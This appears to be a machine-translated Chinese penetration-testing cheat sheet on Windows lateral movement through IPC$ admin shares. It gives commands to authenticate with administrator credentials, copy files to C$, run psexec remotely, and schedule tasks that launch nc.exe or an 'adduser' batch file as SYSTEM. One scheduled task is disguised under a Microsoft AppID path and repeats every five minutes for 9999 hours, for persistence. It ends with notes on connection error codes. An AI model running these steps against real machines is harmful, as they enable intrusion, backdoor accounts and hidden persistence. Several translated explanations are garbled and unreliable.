Description: IPC $ (Internet Process Connection) is a shared resource "named pipes", which is to enable inter-process communication and open named pipes, by providing trusted user name and password, connecting the two sides can establish a secure channel and thus exchange encrypted data channels, enabling access to the remote computer.
Four default share:
Share Name ---------------------- ------ resources annotation
C $ ----------- C: ------------------------ default share
D $ ----------- D: ------- ----------------- default share
IPC $ ----------------------------- ------- remote IPC
ADMIN $ ---- C: \ WINDOWS --------- remote management
1. Create ipc $ connection
net use \\192.168.100.3\ipc$ "password" /user:Administrator
2. Upload the files you want to upload abc.txt file in the current directory
copy abc.txt \\192.168.1.131\c$
3. Verify that the connection is successful
net time \ 192.168.1.131 host connection to view the current ipc time
psexec.exe / accepteula \ 192.168.1.108 cmd // premise is the need to establish a connection empty or non-empty connection
psexec.exe / accepteula \ 192.168.1.108 cmd -u administrator -p 123456 // no need to establish air links
4. Scheduled Tasks execution
at the scheduled tasks:
at \\10.10.10.21 18:51 C:\\nc.exe 2003 scheduled task to run nc program
schtasks scheduled tasks:
schtasks /create /s 10.10.10.19 /u Administrator /p x /ru "SYSTEM" /tn adduser /sc DAILY /st 19:39 /tr c:\\add.bat /F
result:
SUCCESS: The scheduled task "adduser" has successfully been created.
5. Delete Session
net use \\192.168.1.131\ipc$ del
Use schtasks Example:
schtasks /create /ru SYSTEM /sc DAILY /mo 1 /st 00:00:00 /RI 5 /DU 9999:00 /TN \Microsoft\Windows\APPID\Get-system /tr E:\1.bat /F
Was -> / ru run user tasks as specified system -> / sc 1-365 day -> Start Time / st task is 00.00.00 -> / RI repetition interval of 5 minutes -> / DU task duration F force the creation of task> / - \ 1.BAT: 9999 Ge Xiaoshi - -> / TN to specify a name for this task Get-system> / tr operating parameters E
schtasks /create /RU SYSTEM /SC DAILY /mo 1 /ST 00:00:00 /RI 5 /DU 9999:00 /TN \Microsoft\Windows\AppID\Get-system /TR "cmd /c whoami>>d:\1.txt" /F
Was -> / ru run user tasks as specified system -> / sc 1-365 day -> Start Time / st task is 00.00.00 -> / RI repetition interval of 5 minutes -> / DU task duration 9999 hours -> / TN to specify a name for this task Get-system -> / tr parameter to run cmd / c whoami >> d: \ 1.txt (remember double quotes) -> / F task force creation
ipc connection failure reason:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。